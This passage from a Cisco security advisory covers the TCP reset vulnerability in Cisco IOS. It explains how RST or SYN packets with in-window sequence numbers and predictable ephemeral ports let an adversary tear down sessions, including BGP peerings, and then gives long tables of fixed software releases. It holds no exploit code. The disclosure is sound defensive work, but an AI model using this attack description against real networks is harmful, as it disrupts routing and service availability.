UTC (GMT) - ------------------------------------------------------------------------- Summary ======= A vulnerability in the Transmission Control Protocol (TCP) specification (RFC793) has been discovered by an external researcher. The successful exploitation enables an adversary to reset any established TCP connection in a much shorter time than was previously discussed publicly. Depending on the application, the connection may get automatically re-established. In other cases, a user will have to repeat the action (for example, open a new Telnet or SSH session). Depending upon the attacked protocol, a successful attack may have additional consequences beyond terminated connection which must be considered. This attack vector is only applicable to the sessions which are terminating on a device (such as a router, switch, or computer) and not to the sessions that are only passing through the device (for example, transit traffic that is being routed by a router). In addition, this attack vector does not directly compromise data integrity or confidentiality. This advisory is available at http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml, and it describes this vulnerability as it applies to Cisco products that run Cisco IOS\xae software. A companion advisory that describes this vulnerability for products that do not run Cisco IOS software is available at http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml. The severity of the exposure depends upon the protocols and applications that utilize TCP. This attack vector is only applicable to the sessions which are terminating on a device (such as a router, switch, or computer), and not to the sessions that are only passing through the device (for example, transit traffic that is being routed by a router). Details ======= TCP is the transport layer protocol designed to provide connection-oriented reliable delivery of a data stream. To accomplish this, TCP uses a mixture of flags to indicate state and sequence numbers to identify the order in which the packets are to be reassembled. The acknowledgement number is not used in a packet with the reset (RST) flag set because a reset does not expect a packet in return. The full specification of the TCP protocol can be found at http://www.ietf.org/rfc/rfc0793.txt. According to the RFC793 specification, it is possible to reset an established TCP connection by sending a packet with the RST or synchronize (SYN) flag set. However, the sequence number does not have to be an exact match; it is sufficient to fall within the advertised window. This significantly decreases the effort required by an adversary: the larger the window, the easier it is to reset the connection. The destination TCP port is usually known for all standard services (for example, 23 for Telnet, 80 for HTTP). Cisco IOS software uses predictable ephemeral ports for known services with a predictable increment (the next port which will be used for a subsequent connection). These values, while constant for a particular Cisco IOS software version and protocol, can vary from one release to another. Here is an example of a normal termination of a TCP session: Host(1) Host(2) | | | | | ACK ack=1001, window=5000 | |<----------------------------| | | Host(1) is closing the session | RST seq=1001 | |---------------------------->| | | Host(2) is closing the session In addition, the following scenario is also permitted: Host(1) Host(2) | | | | | ACK ack=1001, window=5000 | |<----------------------------| | | Host(1) is closing the session | RST seq=4321 | |---------------------------->| | | Host(2) is closing the session Note how, in the second example, the RST packet was able to terminate the session although the sequence number was not the next expected one (which is 1001). As a general rule, all protocols where a TCP connection stays established for longer than one minute should be considered exposed. The exposure on this vulnerability can be described as follows: * Cisco IOS - All devices running Cisco IOS software are vulnerable. Sessions passing through the device are vulnerable only if the originating or receiving device is vulnerable, but they cannot be attacked on the router itself. This vulnerability does not compromise data integrity or confidentiality. It only affects availability. This vulnerability is documented in the Cisco Bug Toolkit as Bug IDs CSCed27956 ( registered customers only) and CSCed38527 ( registered customers only) . * Cisco IOS Firewall (IOS FW) - The Cisco IOS FW monitors packets passing throughout the router and maintains the session state internally. This way, it is possible to "open" required ports and allow traffic to pass and then close them after the session has finished. Since Cisco IOS FW intercepts and examines all packets passing through the device, all TCP sessions passing through the Cisco IOS FW are vulnerable to this attack. This is valid even if the originating and receiving devices themselves are not vulnerable. This vulnerability is documented in the Cisco Bug Toolkit as Bug ID CSCed93836 ( registered customers only) . * Network Address Translation (NAT) - This vulnerability does not have any effect on NAT. The NAT functionality simply rewrites ports and IP addresses. This feature does not interprete TCP flags and therefore is not vulnerable to this attack. However, the attacking packet will be passed through the router and the receiving device can be affected. Impact ====== The impact will be different for each specific protocol. While in the majority of cases a TCP connection will be automatically re-established, in some specific protocols a second order of consequences may have a larger impact than tearing down the connection itself. Both external and internal (eBGP and iBGP) sessions are equally vulnerable. If an adversary tears down a BGP session between two routers, then all routes which were advertised between these two peers will be withdrawn. This would occur immediately for the router which has been attacked and after the next update/keepalive packet is sent by the other router. The BGP peering session itself will be re-established within a minute after the attack. Depending upon the exact routing configuration, withdrawal of the routes may have any of the following consequences: * No adverse effects at all if an appropriate static route(s) has(have) been defined on both sides of the affected session. * The traffic will be rerouted along other paths. This may cause some congestion along these paths. * A portion of the network will be completely isolated and unreachable. If a BGP peering session is broken a few times within a short time interval, then BGP route dampening may be invoked. Dampening means that affected routes will be withdrawn from the Internet routing table for some period of time. By default that time is 45 minutes. During that time, all of the traffic whose route was advertised over the attacked BGP session will either be rerouted or a portion of the network will be unreachable. Route dampening is not enabled by default. Cisco IOS Firewall Feature Set - ------------------------------ It is possible to terminate an established TCP-based connection even if both endpoints are not vulnerable to this attack. Software Versions and Fixes =========================== Each row of the table describes a release train and the platforms or products for which it is intended. If a given release train is vulnerable, then the earliest possible releases that contain the fix and the anticipated date of availability for each are listed in the Rebuild, Interim, and Maintenance columns. In some cases, no rebuild of a particular release is planned; this is marked with the label "Not scheduled." A device running any release in the given train that is earlier than the release in a specific column (less than the earliest fixed release) is known to be vulnerable, and it should be upgraded at least to the indicated release or a later version (greater than the earliest fixed release label). When selecting a release, keep in mind the following definitions: * Maintenance Most heavily tested and highly recommended release of any label in a given row of the table. * Rebuild Constructed from the previous maintenance or major release in the same train, it contains the fix for a specific vulnerability. Although it receives less testing, it contains only the minimal changes necessary to effect the repair. Cisco has made available several rebuilds of mainline trains to address this vulnerability, but strongly recommends running only the latest maintenance release on mainline trains. * Interim Built at regular intervals between maintenance releases and receives less testing. Interims should be selected only if there is no other suitable release that addresses the vulnerability, and interim images should be upgraded to the next available maintenance release as soon as possible. Interim releases are not available through manufacturing, and usually they are not available for customer download from CCO without prior arrangement with the Cisco Technical Assistance Center (TAC). In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco TAC for assistance, as shown in the section following this table. Fixed Cisco IOS Software Images for Cisco IOS Firewall +------------+---------------------------------+ | Major | Availability of Repaired | | Release | Releases* | +------------+---------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.1-Based | | ** | | | Release | | | | +------------+---------+---------+-------------+ | 12.1 | 12.1 | | | | | (22c) | | | +------------+---------+---------+-------------+ | 12.1E | 12.1 | | | | | (19)E7 | | | | +---------+---------+-------------+ | | | | | +------------+---------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.2-Based | | ** | | | Release | | | | +------------+---------+---------+-------------+ | 12.2 | 12.2 | | | | | (21b) | | | | +---------+---------+-------------+ | | 12.2 | | | | | (23a) | | | +------------+---------+---------+-------------+ | 12.2T | 12.2 | | | | | (11)T11 | | | | +---------+---------+-------------+ | | 12.2 | | | | | (13)T12 | | | | +---------+---------+-------------+ | | 12.2 | | | | | (15)T12 | | | +------------+---------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.3-Based | | ** | | | Release | | | | +------------+---------+---------+-------------+ | 12.3 | 12.3 | | | | | (5c) | | | | +---------+---------+-------------+ | | 12.3 | | | | | (6a) | | | +------------+---------+---------+-------------+ | 12.3T | 12.3(4) | | | | | T4 | | | +------------+---------+---------+-------------+ Fixed Cisco IOS Software Releases and Migration Path +----------+-------------------------------------+ | Major | Availability of Repaired Releases* | | Release | | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 11.1 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 11.1 | 11.1 Vulnerable. Migrate to 11.2 | +----------+-------------------------------------+ | 11.1AA | 11.1AA Vulnerable. Migrate to 11.2P | +----------+-------------------------------------+ | 11.1CC | 11.1CC Vulnerable. Migrate to 12.0 | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 11.2 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 11.2 | 11.2(26f) | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | 11.2P | 11.2(26)P6 | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | 11.2SA | 11.2(8)SA6 Vulnerable. Migrate to | | | 12.0 | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 11.3 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 11.3 | 11.3 Vulnerable. Migrate to 12.0 | | +-------------+---------+-------------+ | | 11.3(11b)T4 | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | | +-------------+---------+-------------+ | | 11.3(11e) | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.0 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 12.0 | 12.0(28) | | | +----------+-------------+---------+-------------+ | 12.0DA | 12.0DA Vulnerable. Migrate to | | | 12.2DA | +----------+-------------------------------------+ | 12.0DB | 12.0DB Vulnerable. Migrate to | | | 12.1DB | +----------+-------------------------------------+ | 12.0DC | 12.0DC Vulnerable. Migrate to | | | 12.1DC | +----------+-------------+---------+-------------+ | 12.0S | 12.0(27)S | | | | +-------------+---------+-------------+ | | 12.0(26)S2 | | | | +-------------+---------+-------------+ | | 12.0(16)S11 | | | | +-------------+---------+-------------+ | | 12.0(24)S5 | | | | +-------------+---------+-------------+ | | 12.0(25)S3 | | | | +-------------+---------+-------------+ | | 12.0(23)S6 | | | +----------+-------------+---------+-------------+ | 12.0SL | 12.0SL Vulnerable. Migrate to 12.0 | | | (23)S3 | +----------+-------------------------------------+ | 12.0ST | 12.0ST Vulnerable. Migrate to 12.0 | | | (26)S2 | +----------+-------------------------------------+ | 12.0SX | 12.0(25)SX4 Not built - contact TAC | +----------+-------------------------------------+ | 12.0SZ | 12.0SZ Vulnerable. Migrate to 12.0 | | | (26)S2 | +----------+-------------------------------------+ | 12.0T | 12.0T Vulnerable. Migrate to 12.1 | +----------+-------------+---------+-------------+ | 12.0W5 | 12.0(28)W5 | | | | | (30) | | | +----------+-------------+---------+-------------+ | 12.0WC | 12.0(5)WC9a | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | 12.0WT | 12.0(13)WT Vulnerable. End of | | | Engineering | +----------+-------------------------------------+ | 12.0WX | 12.0(4)WX Vulnerable. Migrate to | | | 12.0W5 | +----------+-------------------------------------+ | 12.0XA | 12.0(1)XA Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XB | 12.0(1)XB Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.0XC | 12.0(2)XC Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XD | 12.0(2)XD Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XE | 12.0(7)XE Vulnerable. Migrate to | | | 12.1E Latest | +----------+-------------------------------------+ | 12.0XG | 12.0(3)XG Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XH | 12.0(4)XH Vulnerable. Migrate to | | | 12.1 | +----------+-------------------------------------+ | 12.0XI | 12.0(4)XI Vulnerable. Migrate to | | | 12.1 | +----------+-------------------------------------+ | 12.0XJ | 12.0(4)XJ Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XK | 12.0(7)XK Vulnerable. Migrate to | | | 12.1T Latest | +----------+-------------------------------------+ | 12.0XL | 12.0(4)XL Vulnerable. Migrate to | | | 12.2 Latest | +----------+-------------------------------------+ | 12.0XM | 12.0(4)XM Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.0XN | 12.0(5)XN Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XP | 12.0(5.1)XP Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XQ | 12.0(5)XQ Vulnerable. Migrate to | | | 12.1 Latest | +----------+-------------------------------------+ | 12.0XR | 12.0(7)XR Vulnerable. Migrate to | | | 12.2 Latest | +----------+-------------------------------------+ | 12.0XS | 12.0(5)XS Vulnerable. Migrate to | | | 12.1E Latest | +----------+-------------------------------------+ | 12.0XU | 12.0(5)XU Vulnerable. Migrate to | | | 12.0(5)WC | +----------+-------------------------------------+ | 12.0XV | 12.0(7)XV Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.1 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 12.1 | 12.1(20a) | | | | +-------------+---------+-------------+ | | 12.1(4c) | | | | +-------------+---------+-------------+ | | 12.1(22a) | | | +----------+-------------+---------+-------------+ | 12.1AA | 12.1(10)AA Vulnerable. Migrate to | | | 12.2 Latest | +----------+-------------+---------+-------------+ | 12.1AX | 12.1(14)AX | | | +----------+-------------+---------+-------------+ | 12.1AY | 12.1(13)AY Vulnerable. Migrate to | | | 12.1(14)EA1 | +----------+-------------------------------------+ | 12.1DA | 12.2DA Vulnerable. Migrate to | | | 12.2DA | +----------+-------------------------------------+ | 12.1DB | 12.1(5)DB Vulnerable. Migrate to | | | 12.2B | +----------+-------------+---------+-------------+ | 12.1E | 12.1(19)E7 | | | | +-------------+---------+-------------+ | | 12.1(22)E1 | | | | +-------------+---------+-------------+ | | 12.1(11b) | | | | | E14 | | | | +-------------+---------+-------------+ | | 12.1(20)E2 Not built - contact TAC | | +-------------+---------+-------------+ | | 12.1(19)E6 | | | | +-------------+---------+-------------+ | | 12.1(13)E13 | | | | +-------------+---------+-------------+ | | 12.1(8b)E18 | | | | +-------------+---------+-------------+ | | 12.1(14)E10 | | | | +-------------+---------+-------------+ | | 12.1(13)E14 | | | +----------+-------------+---------+-------------+ | 12.1EA | 12.1(20)EA1 | | | +----------+-------------+---------+-------------+ | 12.1EB | 12.1(20)EB | | | +----------+-------------+---------+-------------+ | 12.1EC | 12.1(20)EC | | | +----------+-------------+---------+-------------+ | 12.1EO | 12.1(20)EO | | | | +-------------+---------+-------------+ | | 12.1(19)EO2 | | | | | Available | | | | | on | | | | | 2004-Apr-25 | | | +----------+-------------+---------+-------------+ | 12.1EU | 12.1(20)EU | | | +----------+-------------+---------+-------------+ | 12.1EV | 12.1(12c)EV Vulnerable. Migrate to | | | 12.2(RLS4)S | +----------+-------------+---------+-------------+ | 12.1EW | 12.1(20)EW2 | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | +----------+-------------+---------+-------------+ | 12.1EX | 12.1EX Vulnerable. Migrate to 12.1 | | | (14)E | +----------+-------------------------------------+ | 12.1EY | 12.1(10)EY Vulnerable. Migrate to | | | 12.1(14)E | +----------+-------------+---------+-------------+ | 12.1T | 12.1(5)T17 | | | +----------+-------------+---------+-------------+ | 12.1XA | 12.1(1)XA Vulnerable. Migrate to | | | 12.1(5)T18 | +----------+-------------------------------------+ | 12.1XB | 12.1(1)XB Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XC | 12.1(1)XC Vulnerable. Migrate to | | | 12.2 | +----------+-------------------------------------+ | 12.1XD | 12.1(1)XD Vulnerable. Migrate to | | | 12.2 | +----------+-------------------------------------+ | 12.1XE | 12.1(1)XE Vulnerable. Migrate to | | | 12.1E Latest | +----------+-------------------------------------+ | 12.1XF | 12.1(2)XF Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XG | 12.1(3)XG Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XH | 12.1(2a)XH Vulnerable. Migrate to | | | 12.2 | +----------+-------------------------------------+ | 12.1XI | 12.1(3a)XI Vulnerable. Migrate to | | | 12.2 Latest | +----------+-------------------------------------+ | 12.1XJ | 12.1(3)XJ Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XL | 12.1(3)XL Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XM | 12.1(5)XM Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XP | 12.1(3)XP Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XQ | 12.1(3)XQ Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XR | 12.1(5)XR Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XT | 12.1(3)XT Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1XU | 12.1(5)XU Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.1XV | 12.1(5)XV Vulnerable. Migrate to | | | 12.2XB | +----------+-------------------------------------+ | 12.1YA | 12.1(5)YA Vulnerable. Migrate to | | | 12.2(8)T | +----------+-------------------------------------+ | 12.1YB | 12.1(5)YB Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1YC | 12.1(5)YC Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.1YD | 12.1(5)YD Vulnerable. Migrate to | | | 12.2(8)T | +----------+-------------------------------------+ | 12.1YE | 12.1(5)YE5 Vulnerable. Migrate to | | | 12.2(2)YC | +----------+-------------------------------------+ | 12.1YF | 12.1(5)YF2 Vulnerable. Migrate to | | | 12.2(2)YC | +----------+-------------------------------------+ | 12.1YH | 12.1(5)YH2 Vulnerable. Migrate to | | | 12.2(13)T | +----------+-------------------------------------+ | 12.1YI | 12.1(5)YI2 Vulnerable. Migrate to | | | 12.2(2)YC | +----------+-------------------------------------+ | 12.1YJ | 12.1(11)YJ Vulnerable. Migrate to | | | 12.1EA Latest | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.2 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 12.2 | 12.2(19b) | | | | +-------------+---------+-------------+ | | 12.2(16f) | | | | +-------------+---------+-------------+ | | 12.2(21a) | | | | +-------------+---------+-------------+ | | 12.2(23) | | | | +-------------+---------+-------------+ | | 12.2(12i) | | | | +-------------+---------+-------------+ | | 12.2(10g) | | | | +-------------+---------+-------------+ | | 12.2(13e) | | | | +-------------+---------+-------------+ | | 12.2(17d) | | | | +-------------+---------+-------------+ | | 12.2(21b) | | | | +-------------+---------+-------------+ | | 12.2(23a) | | | +----------+-------------+---------+-------------+ | 12.2B | 12.2(2)B - 12.2(4)B7 Vulnerable. | | | Migrate to 12.2(13)T12 | | +-------------------------------------+ | | 12.2(4)B8 AND FWD Vulnerable. | | | Migrate to 12.3(5a)B1 | +----------+-------------+---------+-------------+ | 12.2BC | 12.2(15) | | | | | BC1C | | | +----------+-------------+---------+-------------+ | 12.2BW | 12.2(4)BW Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------+---------+-------------+ | 12.2BX | 12.2(16)BX2 | | | +----------+-------------+---------+-------------+ | 12.2BY | 12.2(4)BY Vulnerable. Migrate to | | | 12.2(15)B | | +-------------------------------------+ | | 12.2(8)BY Vulnerable. Migrate to | | | 12.2(8)ZB | | +-------------------------------------+ | | 12.2(2)BY Vulnerable. Migrate to | | | 12.2(8)BZ | +----------+-------------------------------------+ | 12.2BZ | 12.2(15)BZ Vulnerable. Migrate to | | | 12.2(16)BX | +----------+-------------------------------------+ | 12.2CX | 12.2(11)CX Vulnerable. Migrate to | | | 12.2(15)BC | +----------+-------------------------------------+ | 12.2CY | 12.2(11)CY Vulnerable. Migrate to | | | 12.2(13)BC1C | +----------+-------------------------------------+ | 12.2DD | 12.2DD Vulnerable. Migrate to 12.2 | | | (4)B1 | +----------+-------------------------------------+ | 12.2DX | 12.2(1)DX Vulnerable. Migrate to | | | 12.2DD | | +-------------------------------------+ | | 12.2(2)DX Vulnerable. Migrate to | | | 12.2B Latest | +----------+-------------+---------+-------------+ | 12.2EW | 12.2(18)EW | | | +----------+-------------+---------+-------------+ | 12.2JA | 12.2(13)JA4 | | | | +-------------+---------+-------------+ | | 12.2(13)JA2 | | | | +-------------+---------+-------------+ | | 12.2(11)JA3 | | | +----------+-------------+---------+-------------+ | 12.2MC | 12.2(15) | | | | | MC1B | | | +----------+-------------+---------+-------------+ | 12.2S | 12.2(22)S | | | | +-------------+---------+-------------+ | | 12.2(14)S7 | | | | +-------------+---------+-------------+ | | 12.2(20)S1 | | | | +-------------+---------+-------------+ | | 12.2(20)S3 | | | | | Available | | | | | on | | | | | 2004-Apr-21 | | | | +-------------+---------+-------------+ | | 12.2(18)S3 | | | +----------+-------------+---------+-------------+ | 12.2SE | 12.2(18)SE | | | +----------+-------------+---------+-------------+ | 12.2SW | 12.2(21)SW | | | +----------+-------------+---------+-------------+ | 12.2SX | 12.2(17a) | | | | | SX2 | | | +----------+-------------+---------+-------------+ | 12.2SXA | 12.2(17b) | | | | | SXA1 | | | +----------+-------------+---------+-------------+ | 12.2SXB | 12.2(17d)SXB1 Not built - contact | | | TAC | +----------+-------------+---------+-------------+ | 12.2SY | 12.2(14)SY3 | | | +----------+-------------+---------+-------------+ | 12.2SZ | 12.2(14)SZ6 | | | +----------+-------------+---------+-------------+ | 12.2T | 12.2(15)T11 | | | | +-------------+---------+-------------+ | | 12.2(13)T12 | | | | +-------------+---------+-------------+ | | 12.2(11)T11 Not built - contact TAC | | +-------------+---------+-------------+ | | 12.2(13)T11 | | | +----------+-------------+---------+-------------+ | 12.2XA | 12.2(2)XA Vulnerable. Migrate to | | | 12.2(11)T | +----------+-------------------------------------+ | 12.2XB | 12.2(2)XB Vulnerable. Migrate to | | | 12.2(15)T | +----------+-------------------------------------+ | 12.2XC | 12.2(2)XC Vulnerable. Migrate to | | | 12.2(8)ZB | +----------+-------------------------------------+ | 12.2XD | 12.2(1)XD Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XE | 12.2(1)XE Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XF | 12.2(1)XF1 Vulnerable. Migrate to | | | 12.2(4)BC1C | +----------+-------------------------------------+ | 12.2XG | 12.2(2)XG Vulnerable. Migrate to | | | 12.2(8)T | +----------+-------------------------------------+ | 12.2XH | 12.2(2)XH Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XI | 12.2(2)XI2 Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XJ | 12.2(2)XJ Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XK | 12.2(2)XK Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XL | 12.2(4)XL Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XM | 12.2(4)XM Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XN | 12.2(2)XN Vulnerable. Migrate to | | | 12.2(11)T | +----------+-------------------------------------+ | 12.2XQ | 12.2(2)XQ Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XS | 12.2(1)XS Vulnerable. Migrate to | | | 12.2(11)T | +----------+-------------------------------------+ | 12.2XT | 12.2(2)XT Vulnerable. Migrate to | | | 12.2(11)T | +----------+-------------------------------------+ | 12.2XU | 12.2(2)XU Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2XW | 12.2(4)XW Vulnerable. Migrate to | | | 12.2(13)T12 | +----------+-------------------------------------+ | 12.2YA | 12.2(4)YA Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YB | 12.2(4)YB Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YC | 12.2(2)YC Vulnerable. Migrate to | | | 12.2(11)T11 | +----------+-------------------------------------+ | 12.2YD | 12.2(8)YD Vulnerable. Migrate to | | | 12.2(8)YY | +----------+-------------------------------------+ | 12.2YE | 12.2(9)YE Vulnerable. Migrate to | | | 12.2S | +----------+-------------------------------------+ | 12.2YF | 12.2(4)YF Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YG | 12.2(4)YG Vulnerable. Migrate to | | | 12.2(13)T12 | +----------+-------------------------------------+ | 12.2YH | 12.2(4)YH Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YJ | 12.2(8)YJ Vulnerable. Migrate to | | | 12.2(15)T12 | +----------+-------------------------------------+ | 12.2YK | 12.2(2)YK Vulnerable. Migrate to | | | 12.2(13)ZC | +----------+-------------------------------------+ | 12.2YL | 12.2(8)YL Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YM | 12.2(8)YM Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YN | 12.2(8)YN Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YO | 12.2(9)YO Vulnerable. Migrate to | | | 12.2(14)SY | +----------+-------------------------------------+ | 12.2YP | 12.2(11)YP Vulnerable. Migrate to | | | 12.2T Latest | +----------+-------------------------------------+ | 12.2YQ | 12.2(11)YQ Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YR | 12.2(11)YR Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YS | 12.2(11)YS Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.2YT | 12.2(11)YT Vulnerable. Migrate to | | | 12.2(15)T | +----------+-------------------------------------+ | 12.2YU | 12.2(11)YU Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YV | 12.2(11)YV Vulnerable. Migrate to | | | 12.3(4)T | +----------+-------------------------------------+ | 12.2YW | 12.2(8)YW Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------------------------------+ | 12.2YX | 12.2(11)YX Vulnerable. Migrate to | | | 12.2(RLS3)S | +----------+-------------------------------------+ | 12.2YY | 12.2(8)YY Vulnerable. Migrate to | | | 12.3(1)T | +----------+-------------------------------------+ | 12.2YZ | 12.2(11)YZ Vulnerable. Migrate to | | | 12.2(14)SZ | +----------+-------------+---------+-------------+ | 12.2ZA | 12.2(14)ZA6 | | | +----------+-------------+---------+-------------+ | 12.2ZB | 12.2(8)ZB Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.2ZC | 12.2(13)ZC Vulnerable. Migrate to | | | 12.3T | +----------+-------------+---------+-------------+ | 12.2ZD | 12.2(13)ZD1 | | | +----------+-------------+---------+-------------+ | 12.2ZE | 12.2(13)ZE Vulnerable. Migrate to | | | 12.3 | +----------+-------------------------------------+ | 12.2ZF | 12.2(13)ZF Vulnerable. Migrate to | | | 12.3(4)T | +----------+-------------------------------------+ | 12.2ZG | 12.2(13)ZG Vulnerable. Migrate to | | | 12.3(4)T | +----------+-------------------------------------+ | 12.2ZH | 12.2(13)ZH Vulnerable. Migrate to | | | 12.3(4)T | +----------+-------------------------------------+ | 12.2ZI | 12.2(11)ZI Vulnerable. Migrate to | | | 12.2(18)S | +----------+-------------+---------+-------------+ | 12.2ZJ | 12.2(15)ZJ5 | | | | +-------------+---------+-------------+ | | 12.2(15)ZJ4 | | | +----------+-------------+---------+-------------+ | 12.2ZK | 12.2(15)ZK Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.2ZL | 12.2(15)ZL Vulnerable. Migrate to | | | 12.3(7)T | +----------+-------------------------------------+ | 12.2ZN | 12.2(15)ZN Vulnerable. Migrate to | | | 12.3(2)T | +----------+-------------+---------+-------------+ | 12.2ZP | 12.2(13)ZP3 | | | +----------+-------------+---------+-------------+ | Affected | Rebuild | Interim | Maintenance | | 12.3 | | ** | | | -Based | | | | | Release | | | | +----------+-------------+---------+-------------+ | 12.3 | 12.3(3e) | | | | +-------------+---------+-------------+ | | 12.3(6) | | | | +-------------+---------+-------------+ | | 12.3(5b) | | | +----------+-------------+---------+-------------+ | 12.3B | 12.3(5a)B | | | | +-------------+---------+-------------+ | | 12.3(3)B1 | | | +----------+-------------+---------+-------------+ | 12.3BW | 12.3(1a)BW Vulnerable. Migrate to | | | 12.3B | +----------+-------------+---------+-------------+ | 12.3T | 12.3(2)T4 | | | | +-------------+---------+-------------+ | | 12.3(7)T1 Not built - contact TAC | | +-------------+---------+-------------+ | | 12.3(4)T3 | | | +----------+-------------+---------+-------------+ | 12.3XA | 12.3(2)XA Vulnerable. Contact TAC. | +----------+-------------+---------+-------------+ | 12.3XB | 12.3(2)XB2 | | | +----------+-------------+---------+-------------+ | 12.3XC | 12.3(2)XC2 | | | +----------+-------------+---------+-------------+ | 12.3XD | 12.3(4)XD1 | | | +----------+-------------+---------+-------------+ | 12.3XE | 12.3(2)XE Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.3XF | 12.3(2)XF Vulnerable. Contact TAC | | | if needed. | +----------+-------------+---------+-------------+ | 12.3XG | 12.3(4)XG | | | +----------+-------------+---------+-------------+ | 12.3XH | 12.3(4)XH | | | +----------+-------------+---------+-------------+ | 12.3XI | 12.3(7)XI Vulnerable. Migrate to | | | 12.3T | +----------+-------------------------------------+ | 12.3XJ | 12.3(7)XJ Vulnerable. Contact TAC | | | if needed | +----------+-------------+---------+-------------+ | 12.3XK | 12.3(4)XK | | | +----------+-------------+---------+-------------+ | 12.3XL | 12.3(7)XL Vulnerable. Contact Tac | | | if needed | +----------+-------------------------------------+ | 12.3XM | 12.3(9)XM Vulnerable. Contact TAC | | | if needed. | +----------+-------------------------------------+ | 12.3XN | 12.3(4)XN Vulnerable. Contact TAC | | | if needed. | +----------+-------------------------------------+ | 12.3XQ | 12.3(4)XQ Vulnerable. Contact TAC | | | if needed. | +----------+-------------------------------------+ | * All dates are estimated and subject to | | change. | | | | ** Interim releases are subjected to less | | rigorous testing than regular 